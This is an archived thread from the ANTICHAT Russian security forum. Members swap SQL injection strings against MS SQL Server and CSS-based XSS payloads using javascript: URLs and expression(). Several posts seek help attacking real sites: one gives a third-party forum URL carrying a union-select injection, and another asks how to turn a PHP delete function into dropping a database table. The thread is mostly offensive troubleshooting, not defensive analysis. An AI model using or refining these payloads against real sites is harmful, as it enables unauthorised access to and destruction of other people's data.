HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 17.12.2008, 20:09
[Raz0r]
Members of Antichat - Level 5
Регистрация: 25.02.2007
Сообщений: 495
Провел на форуме:
3244717

Репутация: 1980
По умолчанию

Цитата:
Сообщение от SHS  
Проблема:
-1'CREATE PROC test AS SELECT 1;--sp_password

'CREATE PROCEDURE' must be the first statement in a query batch.

Че за фишка? Не въеду...
попробуй так:
1';CREATE PROC test AS SELECT 1;--sp_password

@Mixon
attr:expression() работает только в IE
background-image: url(javascript:alert()) должно везде работать
http://ha.ckers.org/xss.html
 
Ответить с цитированием

  #2  
Старый 18.12.2008, 17:45
Mixon
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903

Репутация: 238
По умолчанию

Цитата:
Сообщение от [Raz0r]  
попробуй так:
1';CREATE PROC test AS SELECT 1;--sp_password

@Mixon
attr:expression() работает только в IE
background-image: url(javascript:alert()) должно везде работать
http://ha.ckers.org/xss.html
Блииин,ну вот сделай html докуменд с содержанием <span style="color:#00FF00;background-image:url(javascript:alert());">ttt</span> и открой,ничего же не пашет!!!
 
Ответить с цитированием

  #3  
Старый 17.12.2008, 19:17
iddqd
Banned
Регистрация: 19.12.2007
Сообщений: 924
Провел на форуме:
4192567

Репутация: 2145


По умолчанию

кажись уже давали эту ссылку:
http://www.inattack.ru/article/519.html
там насчет style 2 вектора есть, попробуй)
 
Ответить с цитированием

  #4  
Старый 18.12.2008, 17:51
Mixon
Участник форума
Регистрация: 12.03.2008
Сообщений: 254
Провел на форуме:
12333903

Репутация: 238
По умолчанию

Цитата:
Сообщение от iddqd  
кажись уже давали эту ссылку:
http://www.inattack.ru/article/519.html
там насчет style 2 вектора есть, попробуй)
Как я и думал,точнейшие примеры из етого сайта по етому,вот

2. <DIV>. Данный тег служит контейнером для внутреннего текста. К тексту, который находится внутри тегов <div></div>, может быть применён определённый стиль (CSS). Вот пример использования данного тега для XSS атаки:
<DIV STYLE="background-image: url(javascript:alert('Я здесь был'))">

Как видите, здесь мы используем вставку кода в параметр STYLE. Но есть и ещё один вариант использования данного тега. Не с помощью функции url(), а через функцию expression():
<DIV STYLE="width: expression(alert('Я здесь был '));">
В данном случае тоже используется параметр STYLE.

3. <STYLE>. Данный тег задает правила оформления и форматирования элементов, находящихся внутри тегов <STYLE></STYLE>. Вот 2 варианта использования XSS:
<STYLE>.XSS{background-image:url("javascript:alert('Я здесь был ')");}</STYLE><A CLASS=XSS></A>

Здесь происходит следующее действие – сначала объявляется класс XSS(в нём расположен XSS- код), а затем он вызывается с помощью
<A CLASS=XSS></A>

Второй вариант:
<STYLE> type="text/css">BODY{background:url("javascript:alert(‘Я здесь был’)")} </STYLE>
В этом варианте наш XSS-код указывается как фоновое изображение странички.



И НЕОДИН ИЗ НИХ НЕ ПАШЕТ!(((
 
Ответить с цитированием

  #5  
Старый 17.12.2008, 20:33
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941

Репутация: 2
По умолчанию

Там опечатка была )) Ну а в целом я так и сделал. И опять такую же ошибку выдает...

Еще одная интересная фишка:
Если выполнить -1+or+1=(select+user)-- то норм проходит.
А если попробовать :
-1+or+1=(SELECT+top+1+table_name+from+information_s chema.tables)--
Выдает:
Incorrect syntax near the keyword 'top'.

Если так:
-1+or+1=(SELECT+table_name+from+information_schema. tables)--
Incorrect syntax near the keyword 'FROM'.

Странно.

З. Ы. Microsoft SQL Server 2000

Последний раз редактировалось SHS; 17.12.2008 в 20:44..
 
Ответить с цитированием

  #6  
Старый 17.12.2008, 23:31
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
По умолчанию

Цитата:
http://www.u-mama.ru/forum/messages.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,23,24
помогите немогу подобрать значение!
 
Ответить с цитированием

  #7  
Старый 18.12.2008, 01:14
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию

Цитата:
Сообщение от F4R  
помогите немогу подобрать значение!
Тут нет инъекции..
 
Ответить с цитированием

  #8  
Старый 18.12.2008, 05:42
F4R
Banned
Регистрация: 20.06.2008
Сообщений: 296
Провел на форуме:
1385078

Репутация: 126
По умолчанию

Цитата:
Сообщение от R1dex  
Тут нет инъекции..
а что это по твоему?
 
Ответить с цитированием

  #9  
Старый 18.12.2008, 00:30
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


По умолчанию

Обращаюсь к код-хакам:

function del_news($news_id)
{
if ($news_id)
{
//echo("del_news<br>");
$r = mysql_query("SELECT news_icon FROM news WHERE news_id=".$news_id);
$arr = mysql_fetch_array($r);

if ($arr[0]){ del_img($news_id);}
//echo("del_news_id=".$news_id."<br>");
mysql_query("DELETE FROM news WHERE news_id=".$news_id);
}
else echo("Функция del_news(news_id) - не указан news_id.<br>");
}

function del_img($news_id)
{
if ($news_id)
{
//echo("del_img<br>");
$r = mysql_query("SELECT news_icon FROM news WHERE news_id=".$news_id);
$arr = mysql_fetch_array($r);
mysql_query("UPDATE news SET news_icon=NULL WHERE news_id=".$news_id);
unlink("../".img_path.$arr[0]);
}
else echo("Функция del_img(news_id) - не указан news_id.<br>");
}

Если поставить DEL запрос - он прокатит ? Если допустить,что $news_id принимает всё,что угодно. Есть в прайс листе такая кнопка Удалить),и вместо удаления новости я хочу удалить таблицу)).Покатит ? Как это будет выглядеть,я тоже не совсем понимаю =_=

Последний раз редактировалось Велемир; 18.12.2008 в 00:32..
 
Ответить с цитированием

  #10  
Старый 18.12.2008, 08:20
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
По умолчанию

Просто раскрытие путей.

Советую почитать FAQ , там написанно, как инъекцию определить..

Последний раз редактировалось R1dex; 18.12.2008 в 08:28..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.